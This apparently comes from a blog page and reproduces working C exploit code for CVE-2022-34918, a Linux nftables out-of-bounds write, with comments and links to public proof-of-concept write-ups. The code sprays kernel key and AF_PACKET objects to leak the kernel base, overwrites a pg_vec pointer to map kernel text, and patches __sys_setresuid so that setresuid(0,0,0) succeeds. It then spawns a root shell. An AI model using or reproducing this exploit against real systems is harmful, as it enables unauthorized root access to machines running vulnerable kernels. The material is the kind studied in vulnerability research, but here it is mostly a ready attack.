int is_keyring_corrupted(int *id_buffer, uint32_t id_buffer_size,
        int *corrupted_key_id)
{
    uint8_t *buffer;
    int32_t keylen;

    buffer = calloc(1, CORRUPT_SIZE);
    if (buffer == NULL)
        err(1, "calloc");

    for (uint32_t i = 0; i < id_buffer_size; i++)
    {
        if (!id_buffer[i])
            continue;

        keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, CORRUPT_SIZE, 0);
        if (keylen < 0)
        {
            free(buffer);
            err(1, "keyctl");
        }

        if (keylen == CORRUPT_SIZE)
        {
            *corrupted_key_id = id_buffer[i];
            free(buffer);
            return 1;
        }
    }
    free(buffer);
    return 0;
}

/*
 * OOB-read through the corrupted key and scan the returned memory for a
 * freed user_key_payload: a 128-byte-aligned record whose data is still
 * 'A'-filled (0x4141...) at +0x18 but whose qword at +8 is non-zero —
 * that qword is the rcu.func pointer (user_free_payload_rcu), used by the
 * caller to derive the kernel base.  Returns the pointer, or 0 if absent.
 *
 * Fixes vs. original: `buffer` was never freed (leaked on every path) and
 * malloc was unchecked; the redundant ": %m" in err() was dropped.
 */
uint64_t get_keyring_leak(int id_buffer)
{
    uint8_t *buffer = malloc(CORRUPT_SIZE);
    int32_t keylen;
    uint64_t leak = 0;

    if (buffer == NULL)
        err(1, "malloc");

    keylen = keyctl(KEYCTL_READ, id_buffer, (long)buffer, CORRUPT_SIZE, 0);
    if (keylen < 0)
    {
        free(buffer);
        err(1, "keyctl");
    }

    if (keylen == CORRUPT_SIZE)
    {
        /* step through kmalloc-64-spaced records; 128 - 24 skips the
         * corrupted key's own header region first */
        uint8_t *ptr = buffer + (128 - 24);
        while (ptr < buffer + CORRUPT_SIZE - 128)
        {
            if ((*(uint64_t *)(ptr + 0x18) == 0x4141414141414141ULL) &&
                (*(uint64_t *)(ptr + 8) != 0))
            {
                puts("find user_key_payload rcu.func!");
                leak = *(uint64_t *)(ptr + 8);
                break;
            }
            ptr += 128;
        }
    }

    free(buffer);
    return leak;
}

/* Revoke one key by id; id 0 means "empty slot" and is a no-op. Fatal on
 * a failed revoke. */
void release_key(int id_buffer)
{
    if (!id_buffer)
        return;

    if (keyctl(KEYCTL_REVOKE, id_buffer, 0, 0, 0) < 0)
        err(1, "keyctl(KEYCTL_REVOKE): %m");
}

/* Revoke every key in the array and zero the slots so later scans skip them. */
void release_keys(int *id_buffer, uint32_t id_buffer_size)
{
    uint32_t idx = 0;

    while (idx < id_buffer_size)
    {
        release_key(id_buffer[idx]);
        id_buffer[idx] = 0;
        idx++;
    }
}

/*
 * Configure a TPACKET_V3 PACKET_RX_RING on socket `s`: `block_nr` blocks of
 * `block_size` bytes — the kernel allocates the pg_vec pointer array whose
 * size this exploit grooms.  Fatal (err) on failure.
 *
 * Fix vs. original: err(3) already appends strerror(errno) to the message,
 * so the ": %m" in the format strings printed the error text twice.
 */
void packet_socket_rx_ring_init(int s, unsigned int block_size,
        unsigned int frame_size, unsigned int block_nr,
        unsigned int sizeof_priv, unsigned int timeout)
{
    int v = TPACKET_V3;
    int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0)
        err(1, "setsockopt(PACKET_VERSION)");

    struct tpacket_req3 req = {
        .tp_block_size = block_size,
        .tp_frame_size = frame_size,
        .tp_block_nr = block_nr,
        .tp_frame_nr = (block_size * block_nr) / frame_size,
        .tp_retire_blk_tov = timeout,
        .tp_sizeof_priv = sizeof_priv,
        .tp_feature_req_word = 0,
    };

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (rv < 0)
        err(1, "setsockopt(PACKET_RX_RING)");
}

/*
 * Open an AF_PACKET raw socket, install a TPACKET_V3 rx ring with the given
 * geometry, and bind it to the loopback interface of the current netns.
 * Returns the socket fd; fatal (err) on failure.  Requires CAP_NET_RAW —
 * provided by the user namespace entered in unshare_setup().
 *
 * Fix vs. original: dropped the redundant ": %m" from err() formats
 * (err(3) appends strerror(errno) itself, duplicating the message).
 */
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
        unsigned int block_nr, unsigned int sizeof_priv, int timeout)
{
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0)
        err(1, "socket(AF_PACKET)");

    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
            sizeof_priv, timeout);

    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    /* NOTE(review): unchecked — returns 0 (all interfaces) if "lo" is
     * absent in this netns; confirm the namespace always has loopback */
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;

    int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0)
        err(1, "bind(AF_PACKET)");

    return s;
}

/* Convenience wrapper: build an rx ring of `count` blocks of `size` bytes
 * (2048-byte frames, no private area, 100 ms block timeout) and return
 * the backing AF_PACKET socket fd. */
int pagealloc_pad(int count, int size)
{
    const unsigned int frame_sz = 2048;
    const int timeout_ms = 100;

    return packet_socket_setup(size, frame_sz, count, 0, timeout_ms);
}

/*
 * CVE-2022-34918 exploit flow:
 *   1. Enter a user+net namespace so nftables netlink is reachable
 *      unprivileged; pin to CPU 0 so spray and victim share a per-CPU slab.
 *   2. First OOB write (type-confused set element) corrupts a sprayed
 *      user_key_payload's datalen -> OOB read leaks rcu.func
 *      (user_free_payload_rcu) -> kernel base.
 *   3. Second OOB write corrupts an AF_PACKET pg_vec page pointer ->
 *      mmap() of the ring exposes kernel text -> patch __sys_setresuid's
 *      conditional jump -> setresuid(0,0,0) succeeds -> root shell.
 */
int main()
{
/* unbuffered stdio so progress messages survive a crash */
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
char c;
char writebuf[0x2000];
char buf[0x2000];
struct leak_payload leak_pay;
int id_buffer[SPRAY_KEY_CNT] = {0};
int corrupted_key_id = 0;
uint64_t leak_ptr = 0;
uint64_t kbase = 0;

unshare_setup(getuid(), getgid());
set_cpu_affinity(0, 0);

struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER);
const int leak_setid = 1;
const int write_setid = 2;

/* two NFT_DATA_VALUE maps: "leak" sized for leak_payload, "write" for
 * write_payload — the data is what the confused element writes OOB */
create_table(nl, "table");
create_set(nl, "leak", KMALLOC64_KEYLEN, sizeof(struct leak_payload), NFT_DATA_VALUE, "table", leak_setid);
create_set(nl, "write", KMALLOC64_KEYLEN, sizeof(struct write_payload), NFT_DATA_VALUE, "table", write_setid);

printf("spraying user_key_payload ...\n");
spray_keyring(id_buffer, SPRAY_KEY_CNT);

/* punch holes so the vulnerable element lands next to a surviving key */
printf("free some key to create holes ...\n");
for (int i = 0; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP)
{
release_key(id_buffer[i]);
id_buffer[i] = 0;
}

/* leak_pay.len overlays the neighbour key's datalen (see struct) */
puts("trigger oob write ...");
memset(buf, '\0', 0x2000);
leak_pay.len = CORRUPT_SIZE;
create_setelem(nl, buf, KMALLOC64_KEYLEN, &leak_pay, sizeof(struct leak_payload), "leak", "table", leak_setid);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id))
printf("found keyring %d is corrupted!", corrupted_key_id);
else
{
release_keys(id_buffer, SPRAY_KEY_CNT);
err(1, "can't found corrupted keyring ...");
}

/* freeing the other keys plants rcu.func pointers in memory the
 * corrupted key can now read out of bounds */
puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = 0; i < SPRAY_KEY_CNT; i++)
{
if (id_buffer[i] == corrupted_key_id)
continue;
release_key(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id);
if (!leak_ptr)
{
err(1, "leak rcu.func failed");
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);
/* 0x51b0a0 = offset of user_free_payload_rcu in the target kernel build
 * — NOTE(review): build-specific, confirm against the target vmlinux */
kbase = leak_ptr - 0x51b0a0;
printf("leak kbase: 0x%08lx\n", kbase);
if (kbase & 0xFFF)
err(1, "wrong offset!");

int packet_fds[PACKET_SPRAY_CNT] = {0};
int fengshui_fds[PACKET_FENGSHUI_CNT] = {0};

/* point a pg_vec entry at the page containing __sys_setresuid
 * (kbase + 0xdf530, page-aligned) — offset is build-specific too */
struct write_payload write_pay;
memset(&write_pay, 0, sizeof(struct write_payload));
write_pay.pg_vec = (void *)((kbase + 0xdf530) & ~0xfff);

puts("use raw_packet to fenghsui kmalloc-64 ...");
for (int i = 0; i < PACKET_FENGSHUI_CNT; i++)
fengshui_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);

puts("spraying pg_vec in kmalloc-64 ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i++)
{
packet_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);
}

/* holes again, so the second vulnerable element lands beside a pg_vec */
puts("free some pg_vec to create holes ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i += PACKET_FREE_HOLE_STEP)
{
close(packet_fds[i]);
packet_fds[i] = 0;
}

puts("trigger oob write ...");
create_setelem(nl, buf, KMALLOC64_KEYLEN, &write_pay, sizeof(struct write_payload), "write", "table", write_setid);

/* mmap each surviving ring; the corrupted one maps kernel text, which
 * (unlike a fresh ring page) contains non-zero bytes */
puts("searching edited page ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i++)
{
if (!packet_fds[i])
continue;

char *page = (char *)mmap(NULL, PAGE_SIZE * KMALLOC64_PAGE_CNT,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds[i], 0);
if (!page || (ssize_t)page < 0)
{
printf("mmap error: %p\n", page);
continue;
}

int j;
for (j = 0x30; j < 0x1000; j++)
{
if (page[j] != 0)
break;
}
// found non-empty page
if (j != 0x1000)
{
puts("found target page!!");
print_hex(page, 0x100);
/* 0xeb = short JMP, replacing the JNE (0x75) at +0xc9 in
 * __sys_setresuid so the capability check is skipped */
puts("patching __sys_setresuid jne to jmp ...");
page[(kbase + 0xdf530 + 0xc9) & 0xfff] = 0xeb;

setresuid(0, 0, 0);
system("/bin/sh");
return 0;
}
}

puts("can't found target page");
for (int i = 0; i < PACKET_FENGSHUI_CNT; i++)
close(fengshui_fds[i]);
for (int i = 0; i < PACKET_SPRAY_CNT; i++)
close(packet_fds[i]);
}

参考链接:

https://github.com/randorisec/CVE-2022-34918-LPE-PoC

https://tttang.com/archive/1706/

https://vul.360.net/archives/391

 评论
评论插件加载失败
正在加载评论插件
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 335.6k 访客数 访问量